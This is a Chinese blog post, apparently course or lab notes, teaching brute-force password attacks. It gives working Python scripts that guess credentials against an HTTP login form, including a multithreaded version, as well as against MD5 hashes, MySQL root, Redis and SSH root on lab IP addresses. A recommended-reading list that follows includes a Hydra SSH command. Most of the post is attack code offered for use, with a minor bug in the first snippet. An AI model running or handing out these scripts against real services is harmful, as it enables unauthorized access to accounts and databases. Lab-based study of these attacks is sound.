暴力破解案例

最新推荐文章于 2025-04-05 15:33:18 发布
最新推荐文章于 2025-04-05 15:33:18 发布
阅读量888 收藏 3
点赞数 1
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuge_long/article/details/142921785
版权

暴力破解

1 概述

暴力破解,是一种针对密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。

2 爆破HTTP协议

第一步:实验性发送请求成功
import requests
url = "http://192.172.0.100:8080/woniusales/user/login"
    data = {
        "username":"admin",
        "password":"123456",
        "verifycode":"0000"
    }
    result = requests.post(url=url,data=data)
    if result.text != "login-fail":
        print(f"疑是破解成功,密码是:{password}")

第二步:已知用户名,未知密码破解
import requests

def pojie_http(password):
    url = "http://192.172.0.100:8080/woniusales/user/login"
    data = {
        "username":admin,
        "password":password,
        "verifycode":"0000"
    }
    result = requests.post(url=url,data=data)
    if result.text != "login-fail":
        print(f"疑是破解成功,密码是:{password}")
        exit()
with open(file="password.txt") as f:
    passwordlist = f.readlines()
for passwd in passwordlist:
    passwd = passwd.strip()
    pojie_http(passwd)

第三步:未知用户名密码破解

import requests

def pojie_http(username,password):
    url = "http://192.172.0.100:8080/woniusales/user/login"
    data = {
        "username":username,
        "password":password,
        "verifycode":"0000"
    }
    result = requests.post(url=url,data=data)
    if result.text != "login-fail":
        print(f"疑是破解成功,密码是:{password}")
        exit()

with open(file="password.txt") as f:
    passwordlist = f.readlines()

with open(file="username.txt") as f:
    usernamelist = f.readlines()

for user in usernamelist:
    user = user.strip()
    for passwd in passwordlist:
        passwd = passwd.strip()
        pojie_http(user,passwd)

注意:

1.暴力破解不是100%能破解成功,取决于你是否有强大的字典

2.并不是所有的http协议可以暴力破解

​ 2.1 简单的验证码

​ 2.2 没有错误次数的验证

​ 2.3 明文显示,未经过加密

3 多线程破解

一个用户作为一个线程爆破
for user in usernamelist:
    obj = threading.Thread(target=pojie_http,args=(user,))
    obj.start()
# 1.受到本机的性能影响,最大1300线程
# 2.受到服务器性能影响,最大吞吐量

4 多线程分配任务破解

import threading

import requests

def pojie_http(startindex,endindex):
    url = "http://192.172.0.100:8080/woniusales/user/login"
    for user in usernamelist[startindex:endindex]:
        user = user.strip()
        for passwd in passwordlist:
            passwd = passwd.strip()
            data = {
                "username":user,
                "password":passwd,
                "verifycode":"0000"
            }
            result = requests.post(url=url,data=data)
            if result.text != "login-fail":
                print(f"疑是破解成功,用户名是{user},密码是:{passwd}")
                exit()


if __name__ == '__main__':
    with open(file="username.txt") as f:
        usernamelist = f.readlines()

    with open(file="password.txt") as f:
        passwordlist = f.readlines()

	# 分任务爆破,启动100个线程,每个线程跑20个用户,每个用户跑所有的密码,根据服务器动态调整线程个数
    for index in range(100):
        start = 20 * index
        end =  20 * (index + 1)
        obj = threading.Thread(target=pojie_http,args=(start,end))  # 0-10  10-20 20-30 30-40 ...190-200
        obj.start()

5 MD5爆破

MD5无法逆推解密,只能通过穷举法反向查询


import hashlib

def pojie_md5(source,target):
    h_md5 = hashlib.md5(source.encode()).hexdigest()
    print(h_md5)
    if h_md5 == target:
        print(f"怀疑是破解成功:{source}")
        exit()


if __name__ == '__main__':
    target = "e10adc3949ba59abbe56e057f20f883e"
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for i in data_list:
        i = i.strip()
        pojie_md5(source=i,target=target)

6 MySQL爆破

import pymysql

def pojie_mysql(passwd):
    try:
        conn = pymysql.connect(user="root",password=passwd,port=3306,host="192.172.0.100")
    except:
        pass
    # 连接成功什么都没有  连接失败报错
    else:
        print(f"疑是破解成功:{passwd}")
        exit()




if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for passwd in data_list:
        pojie_mysql(passwd.strip())

7 Redis爆破

import redis
def pojie_redis(passwd):
    try:
        redis_obj = redis.Redis(host="192.172.0.101",password=passwd,db=0)
        redis_obj.ping()
    except:
        pass
    else:
        print(f"密码是{passwd}")
        exit()
if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for passwd in data_list:
        pojie_redis(passwd.strip())

8 SSH爆破

import paramiko
from paramiko.client import AutoAddPolicy
def pojie_ssh(passwd):
    try:
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(AutoAddPolicy)
        ssh.connect(hostname="192.172.0.100",username="root",password=passwd)
    except:
        pass
    else:
        print(f"密码是{passwd}")
        exit()

if __name__ == '__main__':
    with open(file="password.txt") as f:
        data_list = f.readlines()
    for passwd in data_list:
        pojie_ssh(passwd.strip())

9 爆破工具

https://blog.csdn.net/m0_59598029/article/details/133217000

https://blog.51cto.com/u_16213303/10539031

https://www.zhihu.com/tardis/bd/art/558677293?source_id=1001

image-20241010112539712

网络攻击之-暴力破解/密码喷射流量告警运营分析篇
村中少年的专栏
12-29 1617
通过列举SSH,SMB,RDP,MYSQL,PGSQL,Kerberos,NTLM等登录认证的数据包,讲解暴力破解的检测,研判分析以及处置建议等
web漏洞之暴力破解
小白的博客
04-08 4024
暴力破解 漏洞概述 暴力破解-枚举。通过利用大量猜测和穷举的方式来尝试获取用户口令的攻击方式,就是猜口令。攻击者一直枚举进行请求,通过对比数据包的长度可以判断是否爆破成功,因为爆破成功和失败的数据包长度不一样。 暴力破解是最流行的密码破解方法之一,然而,它不仅仅是密码破解。暴力破解还可用于发现Web应用程序中的隐藏页面和内容,在你成功之前,这种破解基本上是“破解一次尝试一次”。这种破解有时需要更长的时间,但其成功率也会更高。 漏洞成因 使用弱口令 类似于123456、654321、admin、 adm
SSH暴力破解的应急响应实战案例
weixin_39096432的博客
12-17 1687
SSH暴力破解的应急响应实战案例 事件的起因: 在管理员的某次巡查时发现,22端口存在异常连接的IP。使用命令查看22端口的连接情况: netsatat -anpl | grep 22 跟踪排查思路: 一、排除系统账户情况 1、除了root之外是否还有其它具有特权的的用户(uid为0): awk -F: ‘$3==0{print $1}’ /etc/passwd 2、可以远程登录的账户 awk ‘/$1|$6/{print $1}’ /etc/shadow 普通用户是没有权限的 二、确认攻击情况 1、
暴力破解
qq_40893595的博客
05-12 722
待到秋来九月八,我花开后百花杀暴力破解的实用性例题讲解不重复与不遗漏 暴力破解的实用性 暴力破解是大赛以及企业应用中常用的方法之一,往往大部分题目都可以适用于暴力破解,直接、准确,不在乎结构的美观,但是效率高,方法简单直接,易想到。 但可能时间复杂度和空间复杂度要更高。 例题讲解 真题:年龄谜题 美国数学家维纳(N.Wiener)智力早熟,11 岁就上了大学。他曾在 1935~1936 年应邀来...
25.CrackRTF1(保姆级教程)
最新发布
TiAmo_TA的博客
04-05 827
本节内容对新手可谓是一点都不友好,全是新知识。我只能说尽量顾全每个新知识,建议多找几篇本题的答题思路看一看。OK!进入正文,本篇文章提供两种解法。一是较为详细的在线破解的方法,及其麻烦,理论知识都在这里面。
暴力破解漏洞
m0_53268118的博客
03-24 1650
暴力破解攻击,又叫字典攻击,是指攻击者系统地组合了所有可能性尝试破解用户的账户名,密码等敏感信息,通常使用自动化脚本或者工具进行暴力破解工具漏洞产生的主要原因是1. 没有强制用户设置复杂密码,比如密码由数字,字母,特殊字符构成2.没有使用安全验证码3.没有对用户的登录进行行为限制,如连续5次输入错误后锁定账户一段时间4.没有使用双因素认证,例如手机验证码,双重密码等漏洞利用。
弱口令与暴力破解案例与类型分享
记录开发和安全学习过程中的点点滴滴
04-24 1784
本篇是紧接着上一篇文章因为篇幅过长而剩余的未分享案例与分类,本篇通过案例与碰到的漏洞类型来对我这两个月其中碰到的弱口令与爆力破解漏洞做一个总结,帮助小白快速了解这两种漏洞会遇到的实战情景,当然总结仅是我个人目前碰到的,如果不全,也请给位佬给我留言,方便我进行完善.免责声明以下漏洞案例均已经上报漏洞平台并且进行修复。请勿利用文章内的相关技术从事非法测试,若因此产生一切后果与本博客及本人无关。弱口令是指容易被猜测或破解的密码,而爆破破解是一种通过穷举法尝试所有可能的密码组合以破解密码的方法。
分享一个验证码暴力撞库漏洞的案例
测试小工
11-02 4741
记录一个验证码暴力破解案例,安全问题不容忽视呀。 某公司接到用户反馈,应用存在安全漏洞,通过技术手段可以在无手机情况下,获取验证码,直接修改密码成功。如果用户密码被他人修改成功,直接涉及到资产损失问题,无疑是一个非常严重的漏洞。 通过跟用户交流,他是通过暴力撞库的手段,去匹配正确验证码,由于后端服务没有做次数限制,所以可多次试错,通过程序发送请求,很容易就得到正确的验证码,从而修改用户密码。 回过头,看看正常的密码重置流程 进入用户手机号登录页面 点击「忘记密码」 ,输入手机号 接收四位数验证码,填写
一次真实的应急响应案例(Windows2008)—暴力破解、留隐藏账户与shift粘贴键后门、植入WK程序-应急响应靶场
04-06
一次真实的应急响应案例(Windows2008)—暴力破解、留隐藏账户、shift粘贴键后门、植入wakuang程序——对应的应急响应靶场,应急响应教程参考链接:...
一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门对应的应急响应靶场
03-10
暴力破解、替换ps命令、留多个houmen-应急响应靶场,应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/123323981?spm=1001.2014.3001.5501
暴力破解HTTP验证
weixin_34248705的博客
01-01 591
首先,你总得有像样的字典吧。去国外网站上下wordlist吧,或者自己写个简单的程序来生成字典。如果不会写程序,呵呵呵呵,那就下载字典生成程序吧 。(不过网上下的wordlist,或者用网上下的字典生成程序生成的字典,好像都不好用) 其次,你总得有工具来运用字典干活吧。可以从网上下载工具,比如大名鼎鼎的brutus。Brutus 可以从 [url]http://www...
暴力破解Zip密码十分好用
09-22
暴力破解Zip密码,占用运行空间小,成功概率高,后台运行即可,破解后zip密码可视可储存。
网页密码暴力破解模板,多线程-python
09-05
网页密码暴力破解模板,用python2编写,多线程,可自己调节线程,只是一个模板,需要自己修改里面的关键字,内容等。
CTF练习:HTTP服务之暴力破解
qq_43233085的博客
12-01 2671
CTF练习:HTTP服务之暴力破解环境准备信息收集暴力破解 靶机地址: 链接: https://pan.baidu.com/s/1VODQKtxUrtLp8fl-v2x-bQ 提取码: og4g 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为192.168.137.176 查看靶机的IP,为192.168.137.176 ...
暴力破解密码
Hunterj_Lin的博客
02-28 1349
实验场景:Burp暴力破解 任务一 完成使用burp对DVWA进行密码的暴力破解。 抓取登录报文 发送到Intruder模块 设置目标主机及端口 设置攻击类型以及待暴力破解的参数 设置Payloads参数 设置请求报文频率 开始攻击 找到一个报文长度不一致的,怀疑是密码(理由:成功总是只有一个,失败有千万个) 使用刚刚暴力破解的密码password尝试登录,并且成功 ...
密码暴力破解
ssslq的博客
02-28 1312
密码破解
密码--暴力破解
热门推荐
M_Young的博客
12-10 1万+
1.海德拉(Hydra) hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 root@kali2019:~# hydra -L userlist.txt -P passwordlist.txt -t 20 192.168.106.134 ssh 我们先建立简单的字典 ...
渗透之密码暴力破解
qq_64302290的博客
04-27 625
一般适用于知道用户名不知道密码的时候,只能使用密码字典一个一个试出来。使用工具burp suite,搭建靶场dvwa;打开浏览器的代理功能,将流量全流向burp suite工具拦截。
【htpwdScan 是一个HTTP暴力破解、撞库测试工具。】
pqz1425374181的博客
03-23 1万+
htpwdScan 是一个HTTP暴力破解、撞库测试工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值